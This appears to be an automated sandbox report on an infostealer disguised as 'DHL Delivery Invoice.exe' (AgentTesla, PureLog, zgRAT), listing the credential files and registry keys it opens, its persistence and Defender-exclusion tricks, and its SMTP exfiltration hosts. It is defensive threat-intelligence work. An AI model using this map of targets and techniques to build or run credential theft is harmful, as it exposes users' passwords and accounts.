                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 14.2.LIWBHGsz.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.LIWBHGsz.exe.4909990.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.LIWBHGsz.exe.4909990.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.LIWBHGsz.exe.4b6ace8.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.LIWBHGsz.exe.4b6ace8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL Delivery Invoice.exe.4355848.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.1880257030.0000000004908000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.4259345206.0000000002811000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1880257030.0000000004B6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.4254539671.0000000000437000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.4259229208.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1828601395.0000000004355000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DHL Delivery Invoice.exe PID: 6724, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: DHL Delivery Invoice.exe PID: 2032, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: LIWBHGsz.exe PID: 2852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: LIWBHGsz.exe PID: 7436, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: 10.2.LIWBHGsz.exe.4909990.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.LIWBHGsz.exe.4909990.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.LIWBHGsz.exe.4b6ace8.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.LIWBHGsz.exe.4b6ace8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL Delivery Invoice.exe.4355848.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.1880257030.0000000004908000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.4259345206.0000000002811000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1880257030.0000000004B6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.4259229208.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1828601395.0000000004355000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DHL Delivery Invoice.exe PID: 6724, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: DHL Delivery Invoice.exe PID: 2032, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: LIWBHGsz.exe PID: 2852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: LIWBHGsz.exe PID: 7436, type: MEMORYSTR
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.DHL Delivery Invoice.exe.4335828.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL Delivery Invoice.exe.79a0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL Delivery Invoice.exe.4355848.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL Delivery Invoice.exe.79a0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL Delivery Invoice.exe.4335828.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL Delivery Invoice.exe.4355848.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1843513866.00000000079A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1828601395.0000000004318000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1828601395.0000000004355000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Yara detected zgRAT
                      Source: Yara matchFile source: 0.2.DHL Delivery Invoice.exe.4355848.2.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		111
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		11
                      Input Capture                      		24
                      System Information Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      Scheduled Task/Job                      		2
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		1
                      Query Registry                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                      Software Packing                      		NTDS211
                      Security Software Discovery                      		Distributed Component Object Model11
                      Input Capture                      		2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets1
                      Process Discovery                      		SSH1
                      Clipboard Data                      		23
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials141
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                      Virtualization/Sandbox Evasion                      		DCSync1
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                      Process Injection                      		Proc Filesystem1
                      System Network Configuration Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1564050 Sample: DHL Delivery Invoice.exe Startdate: 27/11/2024 Architecture: WINDOWS Score: 100 46 smtp.yandex.ru 2->46 48 smtp.yandex.com 2->48 50 api.ipify.org 2->50 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Sigma detected: Scheduled temp file as task from temp location 2->60 62 15 other signatures 2->62 8 DHL Delivery Invoice.exe 7 2->8         started        12 LIWBHGsz.exe 2->12         started        signatures3 process4 file5 38 C:\Users\user\AppData\Roaming\LIWBHGsz.exe, PE32 8->38 dropped 40 C:\Users\...\LIWBHGsz.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmpC314.tmp, XML 8->42 dropped 44 C:\Users\...\DHL Delivery Invoice.exe.log, ASCII 8->44 dropped 64 Adds a directory exclusion to Windows Defender 8->64 66 Injects a PE file into a foreign processes 8->66 14 DHL Delivery Invoice.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        26 2 other processes 8->26 68 Multi AV Scanner detection for dropped file 12->68 70 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 12->70 72 Machine Learning detection for dropped file 12->72 22 LIWBHGsz.exe 12->22         started        24 schtasks.exe 12->24         started        signatures6 process7 dnsIp8 52 smtp.yandex.ru 77.88.21.158, 49735, 49738, 49820 YANDEXRU Russian Federation 14->52 54 api.ipify.org 104.26.12.205, 443, 49733, 49737 CLOUDFLARENETUS United States 14->54 74 Installs a global keyboard hook 14->74 76 Loading BitLocker PowerShell Module 18->76 28 conhost.exe 18->28         started        30 WmiPrvSE.exe 18->30         started        32 conhost.exe 20->32         started        78 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 22->78 80 Tries to steal Mail credentials (via file / registry access) 22->80 82 Tries to harvest and steal ftp login credentials 22->82 84 Tries to harvest and steal browser information (history, passwords, etc) 22->84 34 conhost.exe 24->34         started        36 conhost.exe 26->36         started        signatures9 process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      DHL Delivery Invoice.exe53%ReversingLabsWin32.Trojan.CrypterX
                      DHL Delivery Invoice.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\LIWBHGsz.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\LIWBHGsz.exe53%ReversingLabsWin32.Trojan.CrypterX

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://crl.gl00%Avira URL Cloudsafe
                      http://crl.gls0%Avira URL Cloudsafe
                      http://ocsp2.globa0%Avira URL Cloudsafe
                      http://crl.gl(0%Avira URL Cloudsafe
                      http://secure.globalsh0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      smtp.yandex.ru
                      		77.88.21.158
                      		truefalse
                        		high
                        api.ipify.org
                        		104.26.12.205
                        		truefalse
                          		high
                          smtp.yandex.com
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://api.ipify.org/false
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.apache.org/licenses/LICENSE-2.0DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.comDHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designersGDHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://vimeo.com/api/v2/video/DHL Delivery Invoice.exe, 00000000.00000002.1826460252.0000000002B19000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.fontbureau.com/designers/?DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://tempuri.org/_prof_basesDataSet.xsdLIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.founder.com.cn/cn/bTheDHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://account.dyn.com/DHL Delivery Invoice.exe, 00000000.00000002.1828601395.0000000004355000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1880257030.0000000004908000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1880257030.0000000004B6A000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4254539671.0000000000435000.00000040.00000400.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fontbureau.com/designers?DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://vimeo.com/api/v2/album/DHL Delivery Invoice.exe, 00000000.00000002.1826460252.0000000002B19000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.tiro.comDHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://vimeo.com/api/v2/DHL Delivery Invoice.exe, 00000000.00000002.1826460252.0000000002B19000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.com/designersDHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://vimeo.com/api/v2/activity/LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://vimeo.com/api/v2/channel/LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.goodfont.co.krDHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://api.ipify.org/tDHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://smtp.yandex.comDHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002922000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.0000000002CC3000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.000000000290C000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000029C8000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003469000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.000000000350E000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.00000000032ED000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003223000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.00000000035AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.carterandcone.comlDHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.sajatypeworks.comDHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://crl.glsLIWBHGsz.exe, 0000000E.00000002.4288667940.0000000009508000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.typography.netDDHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.fontbureau.com/designers/cabarga.htmlNDHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.founder.com.cn/cn/cTheDHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.galapagosdesign.com/staff/dennis.htmDHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://api.ipify.orgDHL Delivery Invoice.exe, 00000000.00000002.1828601395.0000000004355000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4254547194.0000000000433000.00000040.00000400.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1880257030.0000000004908000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1880257030.0000000004B6A000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://crl.gl0DHL Delivery Invoice.exe, 00000009.00000002.4276985451.0000000006311000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.founder.com.cn/cnDHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.fontbureau.com/designers/frere-user.htmlDHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://tempuri.org/_prof_basesDataSet1.xsdLIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://crl.glDHL Delivery Invoice.exe, 00000009.00000002.4282180177.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4256698207.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4289247854.0000000009561000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4288667940.0000000009508000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4277773414.0000000006AB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://crl.gl(LIWBHGsz.exe, 0000000E.00000002.4277374146.0000000006A87000.00000004.00000020.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4288667940.0000000009508000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.jiyu-kobo.co.jp/DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://ocsp2.globaLIWBHGsz.exe, 0000000E.00000002.4288667940.0000000009508000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.galapagosdesign.com/DPleaseDHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.fontbureau.com/designers8DHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://vimeo.com/api/v2/group/DHL Delivery Invoice.exe, 00000000.00000002.1826460252.0000000002B19000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.fonts.comDHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.sandoll.co.krDHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://secure.globalshLIWBHGsz.exe, 0000000E.00000002.4288667940.0000000009508000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://www.urwpp.deDPleaseDHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.zhongyicts.com.cnDHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDHL Delivery Invoice.exe, 00000000.00000002.1826460252.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, DHL Delivery Invoice.exe, 00000009.00000002.4259345206.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000A.00000002.1877902419.0000000003109000.00000004.00000800.00020000.00000000.sdmp, LIWBHGsz.exe, 0000000E.00000002.4259229208.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.sakkal.comDHL Delivery Invoice.exe, 00000000.00000002.1845962823.0000000009122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high

                                                                                                            World Map of Contacted IPs

                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs

                                                                                                            Public IPs

                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            104.26.12.205
                                                                                                            		api.ipify.orgUnited States
                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                            77.88.21.158
                                                                                                            		smtp.yandex.ruRussian Federation
                                                                                                            		13238YANDEXRUfalse

                                                                                                            General Information

                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                            Analysis ID:1564050
                                                                                                            Start date and time:2024-11-27 19:14:07 +01:00
                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                            Overall analysis duration:0h 10m 32s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                            Number of analysed new started processes analysed:19
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:0
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample name:DHL Delivery Invoice.exe
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@21/15@2/2
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 100%
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 99%
                                                                                                            • Number of executed functions: 181
                                                                                                            • Number of non-executed functions: 28
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .exe
                                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                            Warnings

                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                            • VT rate limit hit for: DHL Delivery Invoice.exe

                                                                                                            Simulations

                                                                                                            Behavior and APIs

                                                                                                            TimeTypeDescription
                                                                                                            13:15:12API Interceptor7820132x Sleep call for process: DHL Delivery Invoice.exe modified
                                                                                                            13:15:13API Interceptor40x Sleep call for process: powershell.exe modified
                                                                                                            13:15:17API Interceptor5431531x Sleep call for process: LIWBHGsz.exe modified
                                                                                                            18:15:13Task SchedulerRun new task: LIWBHGsz path: C:\Users\user\AppData\Roaming\LIWBHGsz.exe

                                                                                                            Joe Sandbox View / Context

                                                                                                            IPs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            104.26.12.205Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                                                                                            • api.ipify.org/
                                                                                                            Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                                                                            • api.ipify.org/
                                                                                                            6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                                                                            • api.ipify.org/
                                                                                                            perfcc.elfGet hashmaliciousXmrigBrowse
                                                                                                            • api.ipify.org/
                                                                                                            SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                            • api.ipify.org/
                                                                                                            SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                            • api.ipify.org/
                                                                                                            hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                            • api.ipify.org/
                                                                                                            file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                            • api.ipify.org/
                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • api.ipify.org/
                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • api.ipify.org/
                                                                                                            77.88.21.158DATASHEET.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              DATASHEET.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                datasheet.exeGet hashmaliciousAgentTeslaBrowse
